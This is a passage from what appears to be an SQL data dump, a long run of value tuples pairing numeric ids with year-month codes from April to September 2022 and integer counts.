'202204',12),(335,1,'202204',12),(3060,1,'202204',12),(3746,1,'202204',12),(487,1,'202204',13),(1544,1,'202204',13),(1598,1,'202204',13),(3004,1,'202204',13),(4524,1,'202204',13),(1606,1,'202204',14),(1608,1,'202204',14),(2809,1,'202204',14),(3764,1,'202204',14),(4391,1,'202204',14),(3087,1,'202204',15),(87,1,'202204',16),(2297,1,'202204',16),(1588,1,'202204',17),(1596,1,'202204',17),(2309,1,'202204',18),(2503,1,'202204',18),(468,1,'202204',19),(3005,1,'202204',20),(89,1,'202204',21),(1582,1,'202204',22),(4457,1,'202204',22),(76,1,'202204',23),(91,1,'202204',23),(108,1,'202204',23),(1600,1,'202204',23),(1602,1,'202204',24),(68,1,'202204',25),(1594,1,'202204',29),(4335,1,'202204',35),(72,1,'202204',37),(80,1,'202204',54),(1586,1,'202204',57),(2904,1,'202204',122),(9,1,'202204',718),(106,1,'202205',1),(110,1,'202205',1),(2751,1,'202205',1),(3240,1,'202205',1),(3263,1,'202205',1),(3265,1,'202205',1),(3275,1,'202205',1),(3742,1,'202205',1),(4382,1,'202205',1),(481,1,'202205',2),(482,1,'202205',2),(1584,1,'202205',2),(1701,1,'202205',2),(1705,1,'202205',2),(1734,1,'202205',2),(1751,1,'202205',2),(1776,1,'202205',2),(2152,1,'202205',2),(2801,1,'202205',2),(3079,1,'202205',2),(3097,1,'202205',2),(3229,1,'202205',2),(3249,1,'202205',2),(3259,1,'202205',2),(3267,1,'202205',2),(3534,1,'202205',2),(3738,1,'202205',2),(3771,1,'202205',2),(4363,1,'202205',2),(476,1,'202205',3),(480,1,'202205',3),(484,1,'202205',3),(1590,1,'202205',3),(1707,1,'202205',3),(1711,1,'202205',3),(1739,1,'202205',3),(1745,1,'202205',3),(1747,1,'202205',3),(1770,1,'202205',3),(1780,1,'202205',3),(1782,1,'202205',3),(2063,1,'202205',3),(2558,1,'202205',3),(2658,1,'202205',3),(2775,1,'202205',3),(2991,1,'202205',3),(3109,1,'202205',3),(3251,1,'202205',3),(3278,1,'202205',3),(3287,1,'202205',3),(3438,1,'202205',3),(3482,1,'202205',3),(3541,1,'202205',3),(3714,1,'202205',3),(3721,1,'202205',3),(3727,1,'202205',3),(3752,1,'202205',3),(3777,1,'202205',3),(4357,1,'202205',3),(4387,1,'202205',3),(4396,1,'202205',3),(4408,1,'202205',3),(4432,1,'202205',3),(4440,1,'202205',3),(473,1,'202205',4),(474,1,'202205',4),(479,1,'202205',4),(483,1,'202205',4),(485,1,'202205',4),(487,1,'202205',4),(1713,1,'202205',4),(1720,1,'202205',4),(1722,1,'202205',4),(1724,1,'202205',4),(1737,1,'202205',4),(1768,1,'202205',4),(1778,1,'202205',4),(2148,1,'202205',4),(2150,1,'202205',4),(2252,1,'202205',4),(2748,1,'202205',4),(2964,1,'202205',4),(3006,1,'202205',4),(3027,1,'202205',4),(3038,1,'202205',4),(3041,1,'202205',4),(3087,1,'202205',4),(3096,1,'202205',4),(3117,1,'202205',4),(3253,1,'202205',4),(3257,1,'202205',4),(3261,1,'202205',4),(3273,1,'202205',4),(3307,1,'202205',4),(3430,1,'202205',4),(3498,1,'202205',4),(3724,1,'202205',4),(3731,1,'202205',4),(4275,1,'202205',4),(4301,1,'202205',4),(4341,1,'202205',4),(4368,1,'202205',4),(4373,1,'202205',4),(4424,1,'202205',4),(4444,1,'202205',4),(4546,1,'202205',4),(471,1,'202205',5),(478,1,'202205',5),(1709,1,'202205',5),(1741,1,'202205',5),(1743,1,'202205',5),(1749,1,'202205',5),(1766,1,'202205',5),(1772,1,'202205',5),(2156,1,'202205',5),(2161,1,'202205',5),(2165,1,'202205',5),(2178,1,'202205',5),(2293,1,'202205',5),(2296,1,'202205',5),(2911,1,'202205',5),(2956,1,'202205',5),(3066,1,'202205',5),(3069,1,'202205',5),(3083,1,'202205',5),(3092,1,'202205',5),(3280,1,'202205',5),(3297,1,'202205',5),(3316,1,'202205',5),(3486,1,'202205',5),(3489,1,'202205',5),(3531,1,'202205',5),(3735,1,'202205',5),(3774,1,'202205',5),(4329,1,'202205',5),(4436,1,'202205',5),(74,1,'202205',6),(477,1,'202205',6),(488,1,'202205',6),(1697,1,'202205',6),(1699,1,'202205',6),(1726,1,'202205',6),(1774,1,'202205',6),(2965,1,'202205',6),(3023,1,'202205',6),(3034,1,'202205',6),(3045,1,'202205',6),(3104,1,'202205',6),(3107,1,'202205',6),(3226,1,'202205',6),(3243,1,'202205',6),(3247,1,'202205',6),(3269,1,'202205',6),(3271,1,'202205',6),(3282,1,'202205',6),(3313,1,'202205',6),(3749,1,'202205',6),(4323,1,'202205',6),(4377,1,'202205',6),(4400,1,'202205',6),(4404,1,'202205',6),(4412,1,'202205',6),(4428,1,'202205',6),(4517,1,'202205',6),(4556,1,'202205',6),(102,1,'202205',7),(1610,1,'202205',7),(1703,1,'202205',7),(1728,1,'202205',7),(1730,1,'202205',7),(2248,1,'202205',7),(2609,1,'202205',7),(2993,1,'202205',7),(3063,1,'202205',7),(3090,1,'202205',7),(3124,1,'202205',7),(3285,1,'202205',7),(3290,1,'202205',7),(3479,1,'202205',7),(4326,1,'202205',7),(4332,1,'202205',7),(4338,1,'202205',7),(4454,1,'202205',7),(4529,1,'202205',7),(467,1,'202205',8),(469,1,'202205',8),(470,1,'202205',8),(1604,1,'202205',8),(2989,1,'202205',8),(3060,1,'202205',8),(3102,1,'202205',8),(3245,1,'202205',8),(4420,1,'202205',8),(4520,1,'202205',8),(486,1,'202205',9),(1588,1,'202205',9),(1596,1,'202205',9),(1695,1,'202205',9),(1715,1,'202205',9),(1718,1,'202205',9),(1732,1,'202205',9),(2804,1,'202205',9),(3004,1,'202205',9),(3127,1,'202205',9),(335,1,'202205',10),(2154,1,'202205',10),(2457,1,'202205',10),(2617,1,'202205',10),(3072,1,'202205',10),(3764,1,'202205',10),(4448,1,'202205',10),(472,1,'202205',11),(570,1,'202205',11),(1592,1,'202205',11),(2297,1,'202205',11),(2769,1,'202205',11),(2813,1,'202205',11),(3710,1,'202205',11),(4524,1,'202205',11),(1614,1,'202205',12),(2159,1,'202205',12),(2809,1,'202205',12),(3030,1,'202205',12),(4542,1,'202205',12),(4551,1,'202205',12),(84,1,'202205',13),(1612,1,'202205',13),(4514,1,'202205',13),(3746,1,'202205',14),(76,1,'202205',15),(91,1,'202205',15),(468,1,'202205',15),(1544,1,'202205',15),(2704,1,'202205',15),(4391,1,'202205',15),(1582,1,'202205',16),(2503,1,'202205',16),(3005,1,'202205',16),(4416,1,'202205',16),(89,1,'202205',17),(108,1,'202205',17),(1606,1,'202205',17),(1598,1,'202205',18),(3781,1,'202205',18),(4238,1,'202205',18),(87,1,'202205',19),(2309,1,'202205',19),(4457,1,'202205',19),(1608,1,'202205',25),(68,1,'202205',26),(1594,1,'202205',26),(1586,1,'202205',27),(1600,1,'202205',27),(4335,1,'202205',29),(72,1,'202205',36),(1602,1,'202205',41),(80,1,'202205',54),(2904,1,'202205',95),(9,1,'202205',702),(106,1,'202206',1),(1697,1,'202206',1),(1732,1,'202206',1),(1741,1,'202206',1),(2156,1,'202206',1),(3249,1,'202206',1),(3253,1,'202206',1),(3257,1,'202206',1),(3265,1,'202206',1),(3275,1,'202206',1),(3541,1,'202206',1),(4332,1,'202206',1),(476,1,'202206',2),(483,1,'202206',2),(1705,1,'202206',2),(1707,1,'202206',2),(1711,1,'202206',2),(1713,1,'202206',2),(1715,1,'202206',2),(1730,1,'202206',2),(1734,1,'202206',2),(1739,1,'202206',2),(1743,1,'202206',2),(1780,1,'202206',2),(2063,1,'202206',2),(2161,1,'202206',2),(2248,1,'202206',2),(2252,1,'202206',2),(2293,1,'202206',2),(2296,1,'202206',2),(2748,1,'202206',2),(2775,1,'202206',2),(2965,1,'202206',2),(3023,1,'202206',2),(3087,1,'202206',2),(3096,1,'202206',2),(3097,1,'202206',2),(3124,1,'202206',2),(3229,1,'202206',2),(3243,1,'202206',2),(3247,1,'202206',2),(3259,1,'202206',2),(3261,1,'202206',2),(3263,1,'202206',2),(3269,1,'202206',2),(3271,1,'202206',2),(3273,1,'202206',2),(3278,1,'202206',2),(3280,1,'202206',2),(3287,1,'202206',2),(3316,1,'202206',2),(3486,1,'202206',2),(3498,1,'202206',2),(3531,1,'202206',2),(3534,1,'202206',2),(3710,1,'202206',2),(3724,1,'202206',2),(3749,1,'202206',2),(3752,1,'202206',2),(4323,1,'202206',2),(4373,1,'202206',2),(4436,1,'202206',2),(4440,1,'202206',2),(102,1,'202206',3),(467,1,'202206',3),(478,1,'202206',3),(481,1,'202206',3),(482,1,'202206',3),(484,1,'202206',3),(488,1,'202206',3),(1701,1,'202206',3),(1703,1,'202206',3),(1749,1,'202206',3),(1751,1,'202206',3),(2150,1,'202206',3),(3027,1,'202206',3),(3030,1,'202206',3),(3034,1,'202206',3),(3041,1,'202206',3),(3045,1,'202206',3),(3069,1,'202206',3),(3090,1,'202206',3),(3102,1,'202206',3),(3107,1,'202206',3),(3109,1,'202206',3),(3245,1,'202206',3),(3267,1,'202206',3),(3297,1,'202206',3),(3307,1,'202206',3),(3479,1,'202206',3),(3714,1,'202206',3),(3721,1,'202206',3),(3727,1,'202206',3),(3735,1,'202206',3),(4275,1,'202206',3),(4329,1,'202206',3),(4341,1,'202206',3),(4357,1,'202206',3),(4368,1,'202206',3),(4387,1,'202206',3),(4400,1,'202206',3),(4420,1,'202206',3),(473,1,'202206',4),(479,1,'202206',4),(480,1,'202206',4),(485,1,'202206',4),(1590,1,'202206',4),(1737,1,'202206',4),(1747,1,'202206',4),(1766,1,'202206',4),(1772,1,'202206',4),(1776,1,'202206',4),(1778,1,'202206',4),(1782,1,'202206',4),(2152,1,'202206',4),(2165,1,'202206',4),(2178,1,'202206',4),(2617,1,'202206',4),(2911,1,'202206',4),(2956,1,'202206',4),(2964,1,'202206',4),(2989,1,'202206',4),(2993,1,'202206',4),(3006,1,'202206',4),(3063,1,'202206',4),(3127,1,'202206',4),(3240,1,'202206',4),(3251,1,'202206',4),(3285,1,'202206',4),(3290,1,'202206',4),(3430,1,'202206',4),(3482,1,'202206',4),(3489,1,'202206',4),(3771,1,'202206',4),(3774,1,'202206',4),(3777,1,'202206',4),(4301,1,'202206',4),(4338,1,'202206',4),(4363,1,'202206',4),(4408,1,'202206',4),(4412,1,'202206',4),(4416,1,'202206',4),(4428,1,'202206',4),(4517,1,'202206',4),(4542,1,'202206',4),(4551,1,'202206',4),(4556,1,'202206',4),(472,1,'202206',5),(474,1,'202206',5),(487,1,'202206',5),(1584,1,'202206',5),(1610,1,'202206',5),(1612,1,'202206',5),(1722,1,'202206',5),(1726,1,'202206',5),(2148,1,'202206',5),(2804,1,'202206',5),(3066,1,'202206',5),(3079,1,'202206',5),(3083,1,'202206',5),(3092,1,'202206',5),(3104,1,'202206',5),(3313,1,'202206',5),(3738,1,'202206',5),(4382,1,'202206',5),(4424,1,'202206',5),(4444,1,'202206',5),(4546,1,'202206',5),(471,1,'202206',6),(1604,1,'202206',6),(1695,1,'202206',6),(1699,1,'202206',6),(1709,1,'202206',6),(1720,1,'202206',6),(1728,1,'202206',6),(1770,1,'202206',6),(1774,1,'202206',6),(2558,1,'202206',6),(2801,1,'202206',6),(2809,1,'202206',6),(3005,1,'202206',6),(3038,1,'202206',6),(3226,1,'202206',6),(3438,1,'202206',6),(4396,1,'202206',6),(4529,1,'202206',6),(469,1,'202206',7),(570,1,'202206',7),(1592,1,'202206',7),(1724,1,'202206',7),(1768,1,'202206',7),(2457,1,'202206',7),(2609,1,'202206',7),(2704,1,'202206',7),(2991,1,'202206',7),(3004,1,'202206',7),(3060,1,'202206',7),(3282,1,'202206',7),(3731,1,'202206',7),(4404,1,'202206',7),(4432,1,'202206',7),(4454,1,'202206',7),(4514,1,'202206',7),(74,1,'202206',8),(477,1,'202206',8),(486,1,'202206',8),(1588,1,'202206',8),(1598,1,'202206',8),(3746,1,'202206',8),(4377,1,'202206',8),(4391,1,'202206',8),(1614,1,'202206',9),(3117,1,'202206',9),(3764,1,'202206',9),(3781,1,'202206',9),(4326,1,'202206',9),(470,1,'202206',10),(1596,1,'202206',10),(2769,1,'202206',10),(3072,1,'202206',10),(4448,1,'202206',10),(4520,1,'202206',10),(4524,1,'202206',10),(335,1,'202206',11),(468,1,'202206',11),(2154,1,'202206',11),(2658,1,'202206',11),(2751,1,'202206',12),(2813,1,'202206',13),(3742,1,'202206',14),(2309,1,'202206',15),(1582,1,'202206',16),(1718,1,'202206',16),(2297,1,'202206',16),(84,1,'202206',17),(1544,1,'202206',17),(91,1,'202206',18),(2503,1,'202206',18),(4238,1,'202206',18),(4335,1,'202206',18),(1606,1,'202206',19),(108,1,'202206',20),(2159,1,'202206',20),(76,1,'202206',21),(1594,1,'202206',21),(4457,1,'202206',21),(1600,1,'202206',22),(68,1,'202206',23),(87,1,'202206',23),(1608,1,'202206',24),(4566,1,'202206',24),(89,1,'202206',25),(1602,1,'202206',32),(72,1,'202206',33),(1586,1,'202206',34),(2904,1,'202206',58),(80,1,'202206',60),(9,1,'202206',676),(106,1,'202207',1),(1705,1,'202207',1),(110,1,'202207',2),(1697,1,'202207',2),(1699,1,'202207',2),(1713,1,'202207',2),(1747,1,'202207',2),(1782,1,'202207',2),(2293,1,'202207',2),(3247,1,'202207',2),(3263,1,'202207',2),(3269,1,'202207',2),(1722,1,'202207',3),(1726,1,'202207',3),(1734,1,'202207',3),(1772,1,'202207',3),(3259,1,'202207',3),(1610,1,'202207',4),(1707,1,'202207',4),(1715,1,'202207',4),(1724,1,'202207',4),(1730,1,'202207',4),(1732,1,'202207',4),(1739,1,'202207',4),(1741,1,'202207',4),(1743,1,'202207',4),(1749,1,'202207',4),(1778,1,'202207',4),(2156,1,'202207',4),(2748,1,'202207',4),(3096,1,'202207',4),(3245,1,'202207',4),(3278,1,'202207',4),(3287,1,'202207',4),(3486,1,'202207',4),(3714,1,'202207',4),(4363,1,'202207',4),(102,1,'202207',5),(480,1,'202207',5),(1695,1,'202207',5),(1709,1,'202207',5),(1737,1,'202207',5),(1768,1,'202207',5),(1774,1,'202207',5),(1780,1,'202207',5),(2152,1,'202207',5),(2165,1,'202207',5),(2178,1,'202207',5),(2252,1,'202207',5),(2809,1,'202207',5),(2965,1,'202207',5),(2991,1,'202207',5),(2993,1,'202207',5),(3006,1,'202207',5),(3023,1,'202207',5),(3027,1,'202207',5),(3034,1,'202207',5),(3066,1,'202207',5),(3079,1,'202207',5),(3104,1,'202207',5),(3117,1,'202207',5),(3240,1,'202207',5),(3257,1,'202207',5),(3273,1,'202207',5),(3280,1,'202207',5),(3290,1,'202207',5),(3297,1,'202207',5),(3307,1,'202207',5),(3430,1,'202207',5),(3438,1,'202207',5),(3727,1,'202207',5),(3738,1,'202207',5),(4556,1,'202207',5),(481,1,'202207',6),(1703,1,'202207',6),(1711,1,'202207',6),(1728,1,'202207',6),(1751,1,'202207',6),(2063,1,'202207',6),(2150,1,'202207',6),(2161,1,'202207',6),(2248,1,'202207',6),(2558,1,'202207',6),(2801,1,'202207',6),(3041,1,'202207',6),(3063,1,'202207',6),(3072,1,'202207',6),(3083,1,'202207',6),(3087,1,'202207',6),(3092,1,'202207',6),(3097,1,'202207',6),(3102,1,'202207',6),(3226,1,'202207',6),(3249,1,'202207',6),(3261,1,'202207',6),(3267,1,'202207',6),(3275,1,'202207',6),(3479,1,'202207',6),(3489,1,'202207',6),(3721,1,'202207',6),(3735,1,'202207',6),(3746,1,'202207',6),(3774,1,'202207',6),(3777,1,'202207',6),(4357,1,'202207',6),(4454,1,'202207',6),(84,1,'202207',7),(471,1,'202207',7),(478,1,'202207',7),(479,1,'202207',7),(486,1,'202207',7),(1584,1,'202207',7),(1720,1,'202207',7),(2775,1,'202207',7),(2964,1,'202207',7),(2989,1,'202207',7),(3005,1,'202207',7),(3038,1,'202207',7),(3045,1,'202207',7),(3090,1,'202207',7),(3109,1,'202207',7),(3124,1,'202207',7),(3229,1,'202207',7),(3251,1,'202207',7),(3265,1,'202207',7),(3271,1,'202207',7),(3313,1,'202207',7),(3498,1,'202207',7),(3731,1,'202207',7),(3752,1,'202207',7),(3771,1,'202207',7),(4275,1,'202207',7),(4373,1,'202207',7),(4382,1,'202207',7),(4387,1,'202207',7),(4444,1,'202207',7),(4448,1,'202207',7),(4551,1,'202207',7),(74,1,'202207',8),(335,1,'202207',8),(476,1,'202207',8),(483,1,'202207',8),(484,1,'202207',8),(485,1,'202207',8),(1701,1,'202207',8),(1766,1,'202207',8),(1776,1,'202207',8),(2148,1,'202207',8),(2296,1,'202207',8),(2704,1,'202207',8),(2769,1,'202207',8),(2804,1,'202207',8),(3060,1,'202207',8),(3243,1,'202207',8),(3531,1,'202207',8),(3710,1,'202207',8),(3724,1,'202207',8),(3749,1,'202207',8),(4238,1,'202207',8),(4332,1,'202207',8),(4368,1,'202207',8),(4396,1,'202207',8),(4428,1,'202207',8),(467,1,'202207',9),(468,1,'202207',9),(1745,1,'202207',9),(1770,1,'202207',9),(2911,1,'202207',9),(3004,1,'202207',9),(3107,1,'202207',9),(3253,1,'202207',9),(3285,1,'202207',9),(3482,1,'202207',9),(3541,1,'202207',9),(4329,1,'202207',9),(4338,1,'202207',9),(4341,1,'202207',9),(4391,1,'202207',9),(4400,1,'202207',9),(4404,1,'202207',9),(4408,1,'202207',9),(4546,1,'202207',9),(87,1,'202207',10),(474,1,'202207',10),(482,1,'202207',10),(1544,1,'202207',10),(1590,1,'202207',10),(1718,1,'202207',10),(3030,1,'202207',10),(3316,1,'202207',10),(3534,1,'202207',10),(4301,1,'202207',10),(4323,1,'202207',10),(4424,1,'202207',10),(4436,1,'202207',10),(4517,1,'202207',10),(4542,1,'202207',10),(470,1,'202207',11),(488,1,'202207',11),(2154,1,'202207',11),(2503,1,'202207',11),(2617,1,'202207',11),(3282,1,'202207',11),(3764,1,'202207',11),(4377,1,'202207',11),(4412,1,'202207',11),(4416,1,'202207',11),(4440,1,'202207',11),(1592,1,'202207',12),(2297,1,'202207',12),(2457,1,'202207',12),(2956,1,'202207',12),(4420,1,'202207',12),(4432,1,'202207',12),(4514,1,'202207',12),(4529,1,'202207',12),(473,1,'202207',13),(1596,1,'202207',13),(1604,1,'202207',13),(2658,1,'202207',13),(2813,1,'202207',13),(76,1,'202207',14),(108,1,'202207',14),(477,1,'202207',14),(487,1,'202207',14),(570,1,'202207',14),(1614,1,'202207',14),(2751,1,'202207',14),(472,1,'202207',15),(1606,1,'202207',15),(3742,1,'202207',15),(89,1,'202207',16),(1582,1,'202207',16),(1608,1,'202207',16),(2609,1,'202207',16),(3069,1,'202207',16),(3127,1,'202207',16),(4524,1,'202207',16),(4566,1,'202207',16),(1612,1,'202207',17),(4520,1,'202207',17),(68,1,'202207',18),(469,1,'202207',18),(91,1,'202207',19),(1598,1,'202207',19),(1588,1,'202207',20),(2309,1,'202207',20),(4326,1,'202207',20),(4335,1,'202207',21),(3781,1,'202207',23),(4457,1,'202207',23),(1594,1,'202207',32),(72,1,'202207',33),(1600,1,'202207',33),(2159,1,'202207',34),(1586,1,'202207',38),(1602,1,'202207',38),(80,1,'202207',50),(2904,1,'202207',62),(9,1,'202207',634),(106,1,'202208',1),(1701,1,'202208',1),(1730,1,'202208',1),(1732,1,'202208',1),(1734,1,'202208',1),(1780,1,'202208',1),(2248,1,'202208',1),(1705,1,'202208',2),(1737,1,'202208',2),(1751,1,'202208',2),(2156,1,'202208',2),(2252,1,'202208',2),(3092,1,'202208',2),(3096,1,'202208',2),(3097,1,'202208',2),(3265,1,'202208',2),(3267,1,'202208',2),(3482,1,'202208',2),(4542,1,'202208',2),(74,1,'202208',3),(478,1,'202208',3),(485,1,'202208',3),(1695,1,'202208',3),(1699,1,'202208',3),(1709,1,'202208',3),(1713,1,'202208',3),(1715,1,'202208',3),(1743,1,'202208',3),(1745,1,'202208',3),(1778,1,'202208',3),(2161,1,'202208',3),(2775,1,'202208',3),(2956,1,'202208',3),(2993,1,'202208',3),(3034,1,'202208',3),(3087,1,'202208',3),(3245,1,'202208',3),(3247,1,'202208',3),(3249,1,'202208',3),(3273,1,'202208',3),(3278,1,'202208',3),(3297,1,'202208',3),(3430,1,'202208',3),(3727,1,'202208',3),(3731,1,'202208',3),(3735,1,'202208',3),(3738,1,'202208',3),(3771,1,'202208',3),(4323,1,'202208',3),(4332,1,'202208',3),(4396,1,'202208',3),(102,1,'202208',4),(476,1,'202208',4),(481,1,'202208',4),(482,1,'202208',4),(486,1,'202208',4),(1739,1,'202208',4),(1749,1,'202208',4),(1776,1,'202208',4),(2063,1,'202208',4),(2150,1,'202208',4),(2152,1,'202208',4),(2154,1,'202208',4),(2293,1,'202208',4),(2558,1,'202208',4),(2809,1,'202208',4),(3079,1,'202208',4),(3104,1,'202208',4),(3226,1,'202208',4),(3229,1,'202208',4),(3251,1,'202208',4),(3259,1,'202208',4),(3263,1,'202208',4),(3275,1,'202208',4),(3290,1,'202208',4),(3486,1,'202208',4),(3714,1,'202208',4),(3721,1,'202208',4),(3746,1,'202208',4),(3749,1,'202208',4),(3777,1,'202208',4),(4275,1,'202208',4),(4338,1,'202208',4),(4357,1,'202208',4),(4382,1,'202208',4),(4448,1,'202208',4),(4517,1,'202208',4),(4546,1,'202208',4),(335,1,'202208',5),(479,1,'202208',5),(487,1,'202208',5),(488,1,'202208',5),(1697,1,'202208',5),(1703,1,'202208',5),(1707,1,'202208',5),(1711,1,'202208',5),(1720,1,'202208',5),(1722,1,'202208',5),(1741,1,'202208',5),(1768,1,'202208',5),(1770,1,'202208',5),(1772,1,'202208',5),(1774,1,'202208',5),(2178,1,'202208',5),(2296,1,'202208',5),(2801,1,'202208',5),(2911,1,'202208',5),(2964,1,'202208',5),(3027,1,'202208',5),(3083,1,'202208',5),(3107,1,'202208',5),(3243,1,'202208',5),(3261,1,'202208',5),(3269,1,'202208',5),(3280,1,'202208',5),(3285,1,'202208',5),(3287,1,'202208',5),(3438,1,'202208',5),(3498,1,'202208',5),(3531,1,'202208',5),(3534,1,'202208',5),(3710,1,'202208',5),(3724,1,'202208',5),(3752,1,'202208',5),(3774,1,'202208',5),(4408,1,'202208',5),(4412,1,'202208',5),(4416,1,'202208',5),(4444,1,'202208',5),(480,1,'202208',6),(484,1,'202208',6),(1726,1,'202208',6),(2748,1,'202208',6),(3006,1,'202208',6),(3023,1,'202208',6),(3045,1,'202208',6),(3063,1,'202208',6),(3090,1,'202208',6),(3109,1,'202208',6),(3253,1,'202208',6),(3282,1,'202208',6),(3307,1,'202208',6),(3316,1,'202208',6),(3479,1,'202208',6),(3489,1,'202208',6),(4301,1,'202208',6),(4329,1,'202208',6),(4335,1,'202208',6),(4341,1,'202208',6),(4368,1,'202208',6),(4387,1,'202208',6),(4420,1,'202208',6),(4436,1,'202208',6),(4440,1,'202208',6),(4454,1,'202208',6),(4514,1,'202208',6),(4556,1,'202208',6),(84,1,'202208',7),(474,1,'202208',7),(483,1,'202208',7),(1766,1,'202208',7),(1782,1,'202208',7),(2965,1,'202208',7),(2991,1,'202208',7),(3004,1,'202208',7),(3060,1,'202208',7),(3240,1,'202208',7),(3541,1,'202208',7),(4238,1,'202208',7),(4363,1,'202208',7),(4404,1,'202208',7),(4428,1,'202208',7),(87,1,'202208',8),(470,1,'202208',8),(1544,1,'202208',8),(1718,1,'202208',8),(1728,1,'202208',8),(2148,1,'202208',8),(2165,1,'202208',8),(2297,1,'202208',8),(2804,1,'202208',8),(3066,1,'202208',8),(3117,1,'202208',8),(3124,1,'202208',8),(3313,1,'202208',8),(4373,1,'202208',8),(4377,1,'202208',8),(4391,1,'202208',8),(4529,1,'202208',8),(91,1,'202208',9),(108,1,'202208',9),(1610,1,'202208',9),(1724,1,'202208',9),(2751,1,'202208',9),(2989,1,'202208',9),(3102,1,'202208',9),(3257,1,'202208',9),(3271,1,'202208',9),(4424,1,'202208',9),(4551,1,'202208',9),(2159,1,'202208',10),(2503,1,'202208',10),(2609,1,'202208',10),(2617,1,'202208',10),(2813,1,'202208',10),(3038,1,'202208',10),(3041,1,'202208',10),(4326,1,'202208',10),(4400,1,'202208',10),(4520,1,'202208',10),(468,1,'202208',11),(471,1,'202208',11),(1584,1,'202208',11),(1590,1,'202208',11),(2769,1,'202208',11),(3030,1,'202208',11),(3742,1,'202208',11),(4432,1,'202208',11),(4566,1,'202208',11),(467,1,'202208',12),(1604,1,'202208',12),(2658,1,'202208',12),(3072,1,'202208',12),(469,1,'202208',13),(472,1,'202208',13),(477,1,'202208',13),(1596,1,'202208',13),(3764,1,'202208',13),(4582,1,'202208',13),(473,1,'202208',14),(1592,1,'202208',14),(1612,1,'202208',14),(1614,1,'202208',14),(2457,1,'202208',14),(2704,1,'202208',14),(3127,1,'202208',14),(4524,1,'202208',14),(1588,1,'202208',15),(89,1,'202208',17),(570,1,'202208',17),(1582,1,'202208',18),(1598,1,'202208',18),(3069,1,'202208',19),(1606,1,'202208',20),(2309,1,'202208',20),(3781,1,'202208',20),(4457,1,'202208',20),(3005,1,'202208',21),(68,1,'202208',22),(76,1,'202208',22),(72,1,'202208',23),(1608,1,'202208',23),(1602,1,'202208',27),(1594,1,'202208',30),(1586,1,'202208',33),(2904,1,'202208',33),(1600,1,'202208',36),(80,1,'202208',53),(9,1,'202208',620),(106,1,'202209',1),(110,1,'202209',2),(479,1,'202209',2),(1768,1,'202209',2),(1770,1,'202209',2),(1774,1,'202209',2),(3083,1,'202209',2),(3297,1,'202209',2),(3752,1,'202209',2),(480,1,'202209',3),(482,1,'202209',3),(486,1,'202209',3),(1699,1,'202209',3),(1766,1,'202209',3),(2152,1,'202209',3),(2154,1,'202209',3),(2252,1,'202209',3),(2293,1,'202209',3),(2296,1,'202209',3),(2965,1,'202209',3),(3023,1,'202209',3),(3229,1,'202209',3),(3249,1,'202209',3),(3275,1,'202209',3),(3278,1,'202209',3),(3307,1,'202209',3),(3430,1,'202209',3),(3486,1,'202209',3),(3498,1,'202209',3),(3714,1,'202209',3),(3727,1,'202209',3),(4329,1,'202209',3),(4332,1,'202209',3),(4368,1,'202209',3),(4408,1,'202209',3),(4424,1,'202209',3),(102,1,'202209',4),(476,1,'202209',4),(483,1,'202209',4),(1584,1,'202209',4),(1739,1,'202209',4),(1741,1,'202209',4),(1747,1,'202209',4),(1772,1,'202209',4),(2063,1,'202209',4),(2165,1,'202209',4),(2178,1,'202209',4),(2558,1,'202209',4),(2748,1,'202209',4),(2964,1,'202209',4),(3034,1,'202209',4),(3066,1,'202209',4),(3096,1,'202209',4),(3245,1,'202209',4),(3251,1,'202209',4),(3257,1,'202209',4),(3271,1,'202209',4),(3287,1,'202209',4),(3479,1,'202209',4),(3482,1,'202209',4),(3489,1,'202209',4),(3531,1,'202209',4),(3541,1,'202209',4),(3721,1,'202209',4),(3731,1,'202209',4),(3738,1,'202209',4),(3771,1,'202209',4),(3774,1,'202209',4),(3777,1,'202209',4),(4301,1,'202209',4),(4323,1,'202209',4),(4363,1,'202209',4),(4373,1,'202209',4),(4428,1,'202209',4),(4436,1,'202209',4),(478,1,'202209',5),(481,1,'202209',5),(484,1,'202209',5),(485,1,'202209',5),(1709,1,'202209',5),(1711,1,'202209',5),(1713,1,'202209',5),(1718,1,'202209',5),(1730,1,'202209',5),(1743,1,'202209',5),(1745,1,'202209',5),(1751,1,'202209',5),(1778,1,'202209',5),(2161,1,'202209',5),(2248,1,'202209',5),(2617,1,'202209',5),(2658,1,'202209',5),(2801,1,'202209',5),(2911,1,'202209',5),(2956,1,'202209',5),(3087,1,'202209',5),(3243,1,'202209',5),(3247,1,'202209',5),(3263,1,'202209',5),(3265,1,'202209',5),(3273,1,'202209',5),(3280,1,'202209',5),(3282,1,'202209',5),(3438,1,'202209',5),(3724,1,'202209',5),(3735,1,'202209',5),(3746,1,'202209',5),(4275,1,'202209',5),(4357,1,'202209',5),(4387,1,'202209',5),(4440,1,'202209',5),(4546,1,'202209',5),(4556,1,'202209',5),(74,1,'202209',6),(488,1,'202209',6),(1590,1,'202209',6),(1592,1,'202209',6),(1695,1,'202209',6),(1697,1,'202209',6),(1703,1,'202209',6),(1734,1,'202209',6),(1780,1,'202209',6),(2150,1,'202209',6),(2156,1,'202209',6),(2609,1,'202209',6),(2775,1,'202209',6),(3004,1,'202209',6),(3027,1,'202209',6),(3038,1,'202209',6),(3045,1,'202209',6),(3063,1,'202209',6),(3072,1,'202209',6),(3079,1,'202209',6),(3090,1,'202209',6),(3092,1,'202209',6),(3104,1,'202209',6),(3109,1,'202209',6),(3226,1,'202209',6),(3259,1,'202209',6),(3261,1,'202209',6),(3534,1,'202209',6),(3749,1,'202209',6),(4338,1,'202209',6),(4391,1,'202209',6),(4396,1,'202209',6),(4404,1,'202209',6),(4420,1,'202209',6),(4444,1,'202209',6),(4448,1,'202209',6),(4542,1,'202209',6),(474,1,'202209',7),(477,1,'202209',7),(1544,1,'202209',7),(1701,1,'202209',7),(1705,1,'202209',7),(1707,1,'202209',7),(1724,1,'202209',7),(1728,1,'202209',7),(1749,1,'202209',7),(1782,1,'202209',7),(2989,1,'202209',7),(2991,1,'202209',7),(2993,1,'202209',7),(3005,1,'202209',7),(3097,1,'202209',7),(3102,1,'202209',7),(3124,1,'202209',7),(3240,1,'202209',7),(3267,1,'202209',7),(3285,1,'202209',7),(3290,1,'202209',7),(3313,1,'202209',7),(3316,1,'202209',7),(4238,1,'202209',7),(4377,1,'202209',7),(4382,1,'202209',7),(467,1,'202209',8),(472,1,'202209',8),(1604,1,'202209',8),(1610,1,'202209',8),(1715,1,'202209',8),(1726,1,'202209',8),(1732,1,'202209',8),(2804,1,'202209',8),(3030,1,'202209',8),(3269,1,'202209',8),(3710,1,'202209',8),(4335,1,'202209',8),(4416,1,'202209',8),(4432,1,'202209',8),(4454